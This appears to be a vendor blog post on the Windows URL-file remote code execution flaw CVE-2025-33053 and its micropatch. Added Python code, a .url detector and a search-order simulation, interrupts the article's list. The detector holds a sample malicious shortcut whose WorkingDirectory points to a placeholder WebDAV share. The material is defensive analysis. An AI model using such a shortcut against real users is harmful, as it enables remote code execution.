June 2025 Windows updates brought a fix for CVE-2025-33053, a remote code execution vulnerability that was found to be exploited in the wild. The vulnerability allows a malicious URL file pointing to a legitimate local Windows executable to "sideload" a DLL or EXE from the attacker's server on the Internet when opened.
Note that while Microsoft titled this issue "WEBDAV Remote Code Execution", the vulnerability can generally be exploited using any SMB network share, including an internal network shared folder. However, since most firewalls and Internet Service Providers block outbound SMB traffic, WebDAV makes for a much more powerful attack scenario, as it allows the malicious DLL or EXE to be loaded from a server on the Internet right through the firewall.
The Vulnerability
This vulnerability was detected by Alexandra Gofman and David Driker with Check Point Research, who wrote up a detailed analysis. Windows Internet shortcut files, also called URL files by their .url extension, are text-based files initially designed to be desktop shortcuts to Internet sites. As the documentation states, "When the user clicks the icon, the browser is launched and displays the site associated with the shortcut."
In reality, URL files also allow for directly launching executable files from a specified path, and, via the WorkingDirectory value, with a specified CWD (current working directory), which can point to a network path under the attacker's control. This becomes very important when the launched executable - e.g., a legitimate Windows executable from the C:\Windows\System32 folder - tries to load some DLL or launch an EXE and looks for it in the CWD according to its effective search order. In effect, this becomes a "binary planting" attack with a twist.
The attack detected by Check Point used a malicious URL file specifying the path to a legitimate local Windows executable, C:\Program Files\Internet Explorer\iediagcmd.exe, with WorkingDirectory pointing to the attacker's Internet-based network share.
When launched, iediagcmd.exe in turn launches other executables like ipconfig.exe and route.exe without providing a full path to them. According to the CreateProcess documentation, an executable specified without a path is searched for in the following locations, in this order:
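As an added illustration (this is not code from the original post, from 0patch or from Check Point), here is a small Python checker that parses a .url file and flags the combination the attack relies on: a target that is a local executable together with a WorkingDirectory on a remote share. The sample shortcuts below are constructed for this example; the host example.invalid is a placeholder, and the file is assumed to follow the documented [InternetShortcut] INI layout with a URL= and a WorkingDirectory= value.

```python
import configparser
import re
from urllib.parse import unquote, urlparse

# Constructed sample .url file (not the one from the real attack). It has the
# shape described above: a legitimate local executable as the target and a
# WorkingDirectory on a remote WebDAV share. example.invalid is a placeholder.
MALICIOUS_SAMPLE = r"""[InternetShortcut]
URL=file:///C:/Program%20Files/Internet%20Explorer/iediagcmd.exe
WorkingDirectory=\\example.invalid@80\DavWWWRoot\payload
IconIndex=0
"""

# Constructed benign shortcut for comparison: just a web site, no CWD.
BENIGN_SAMPLE = """[InternetShortcut]
URL=https://www.example.invalid/
"""

# WebDAV UNC spellings: \\host@80\..., \\host@SSL\..., \\host@SSL@443\...,
# or a DavWWWRoot path component. A plain \\host\share is SMB (with WebDAV
# as the fallback when the WebClient service is running).
WEBDAV_UNC = re.compile(r"^\\\\[^\\]+@(SSL(@\d+)?|\d+)(\\|$)", re.IGNORECASE)
DAVWWWROOT = re.compile(r"\\DavWWWRoot(\\|$)", re.IGNORECASE)
DRIVE_PATH = re.compile(r"^[A-Za-z]:[\\/]")
EXEC_EXTS = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif")


def parse_url_file(text):
    """Return the [InternetShortcut] section of a .url file as a dict (keys lower-cased)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return {k.lower(): v.strip() for k, v in cp.items("InternetShortcut")}


def target_path(url):
    """Resolve the URL= value to a local filesystem path, or None if it is not local."""
    if DRIVE_PATH.match(url):
        return url
    parsed = urlparse(url)
    if parsed.scheme.lower() == "file":
        path = unquote(parsed.path)
        # file:///C:/... parses with a leading slash before the drive letter
        if re.match(r"^/[A-Za-z]:", path):
            path = path[1:]
        return path.replace("/", "\\")
    return None


def classify_working_directory(wd):
    """Return 'webdav', 'unc', 'local', or None for an empty WorkingDirectory."""
    if not wd:
        return None
    if wd.startswith("\\\\") or wd.startswith("//"):
        norm = wd.replace("/", "\\")
        if WEBDAV_UNC.match(norm) or DAVWWWROOT.search(norm):
            return "webdav"
        return "unc"
    return "local"


def assess(text):
    """Flag a .url file whose target is a local executable while its CWD is a remote share."""
    entry = parse_url_file(text)
    target = target_path(entry.get("url", ""))
    wd_kind = classify_working_directory(entry.get("workingdirectory", ""))
    local_exe = target is not None and target.lower().endswith(EXEC_EXTS)
    return {
        "target": target,
        "working_directory": wd_kind,
        "suspicious": local_exe and wd_kind in ("unc", "webdav"),
    }


if __name__ == "__main__":
    print(assess(MALICIOUS_SAMPLE))
    print(assess(BENIGN_SAMPLE))
```

The check deliberately treats any remote WorkingDirectory, SMB or WebDAV, as suspicious when paired with a local executable target: as the post notes, the WebDAV spelling only widens the reach of the same planting technique. Real triage would also want to look at the URL file's origin (e.g. the Mark of the Web) and at what the targeted executable is known to spawn.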
- The directory from which the application loaded.
- The current directory for the parent process.
- The 32-bit Windows system directory.
- The 16-bit Windows system directory.
- The Windows directory.
- The directories that are listed in the PATH environment variable.
Note that the parent executable (iediagcmd.exe) resides in the C:\Program Files\Internet Explorer folder, while ipconfig.exe and route.exe reside in C:\Windows\System32. The latter are therefore not found in "the directory from which the application loaded," so the search proceeds to the current working directory.
Which is on the attacker's network share.
While this attack could easily be mounted inside the victim computer's network, the attacker would first have to already be inside that network. That is where WebDAV comes in: when the WebClient service is running on the computer, remote network shares are accessible not only via the SMB protocol but also via HTTP-based WebDAV, which goes right through the company's firewall. With WebDAV, the malicious ipconfig.exe or route.exe can be hosted on an Internet web server, and Windows will automatically download and execute them when a user in a firewalled corporate network opens the malicious URL file that seemingly only launches a trusted local executable.
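To make the search order concrete, the following Python simulation (added here; it is not code from the original post, from 0patch or from Check Point) walks the CreateProcess lookup listed above over a constructed view of the victim's disk plus the attacker's share. The attacker host and the C:\Users\victim folder are placeholders, and the set of files is invented for the example.

```python
# Constructed view of the victim's disk plus the attacker's share; the host
# name is a placeholder, not one used in any real attack.
ATTACKER_SHARE = r"\\example.invalid@80\DavWWWRoot\payload"
FILES = {
    r"C:\Program Files\Internet Explorer\iediagcmd.exe",
    r"C:\Windows\System32\ipconfig.exe",
    r"C:\Windows\System32\route.exe",
    ATTACKER_SHARE + r"\ipconfig.exe",
    ATTACKER_SHARE + r"\route.exe",
}
_FILES_LOWER = {f.lower() for f in FILES}


def file_exists(path):
    """Stand-in for a filesystem check; Windows paths are case-insensitive."""
    return path.lower() in _FILES_LOWER


def resolve_executable(name, app_dir, cwd, system32, system16, windows, path_dirs,
                       exists=file_exists):
    """Simulate CreateProcess's lookup of a module name given without a path.

    Returns (role, full_path) for the first directory that holds `name`, walking
    the documented order, or None when nothing is found."""
    candidates = [
        ("application_dir", app_dir),  # directory the parent was loaded from
        ("current_dir", cwd),          # parent's current working directory
        ("system32", system32),        # 32-bit Windows system directory
        ("system16", system16),        # 16-bit Windows system directory
        ("windows", windows),          # Windows directory
    ] + [("path", d) for d in path_dirs]  # PATH entries, last
    for role, directory in candidates:
        if not directory:
            continue
        full = directory.rstrip("\\") + "\\" + name
        if exists(full):
            return role, full
    return None


def simulate_iediagcmd_child(child, cwd):
    """Where a child of iediagcmd.exe (e.g. ipconfig.exe) resolves from for a given CWD."""
    return resolve_executable(
        child,
        app_dir=r"C:\Program Files\Internet Explorer",
        cwd=cwd,
        system32=r"C:\Windows\System32",
        system16=r"C:\Windows\System",
        windows=r"C:\Windows",
        path_dirs=[r"C:\Windows\System32", r"C:\Windows"],
    )


if __name__ == "__main__":
    # CWD set by the malicious URL file: the helper is taken from the share.
    print(simulate_iediagcmd_child("ipconfig.exe", ATTACKER_SHARE))
    # CWD is an ordinary local folder (constructed): System32 wins as expected.
    print(simulate_iediagcmd_child("ipconfig.exe", r"C:\Users\victim"))
```

The simulation also shows why the parent's own location matters: a parent loaded from C:\Windows\System32 finds ipconfig.exe in step 1 and never consults the CWD, which is exactly what makes an executable outside System32 that spawns System32 tools by bare name the useful host for this attack.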
Microsoft's Patch
Microsoft patched this issue by changing the behavior of URL files so that the WorkingDirectory value is ignored when launching executables.
Our Micropatch
Our patch does exactly the same thing as Microsoft's.
Micropatch Availability
Micropatches were written for the following security-adopted versions of Windows with all available Windows Updates installed:
- Windows 11 21H2 - fully updated
- Windows 10 21H2 - fully updated
- Windows 10 21H1 - fully updated
- Windows 10 20H2 - fully updated
- Windows 10 2004 - fully updated
- Windows 10 1909 - fully updated
- Windows 10 1809 - fully updated
- Windows 10 1803 - fully updated
- Windows 7 - fully updated without ESU, with ESU 1, ESU 2 or ESU 3
- Windows Server 2008 R2 - fully updated without ESU, with ESU 1, ESU 2, ESU 3 or ESU 4
- Windows Server 2012 - fully updated without ESU, with ESU 1
- Windows Server 2012 R2 - fully updated without ESU, with ESU 1
Micropatches have already been distributed to, and applied on, all affected online computers with 0patch Agent in PRO or Enterprise accounts (unless Enterprise group settings prevented that).
Vulnerabilities like these get discovered on a regular basis, and attackers know about them all. If you're using Windows versions that aren't receiving official security updates anymore, 0patch will make sure these vulnerabilities won't be exploited on your computers - and you won't even have to know or care about these things.
If you're new to 0patch, create a free account in 0patch Central, start a free trial, then install and register 0patch Agent. Everything else will happen automatically. No computer reboot will be needed.
We would like to thank security researchers Alexandra Gofman and David Driker with Check Point Research for publishing their analysis, which made it possible for us to create a micropatch for this issue.
Did you know 0patch will security-adopt Windows 10 when it goes out of support in October 2025, allowing you to keep using it for at least 5 more years? Read more about it here.
To learn more about 0patch, please visit our Help Center.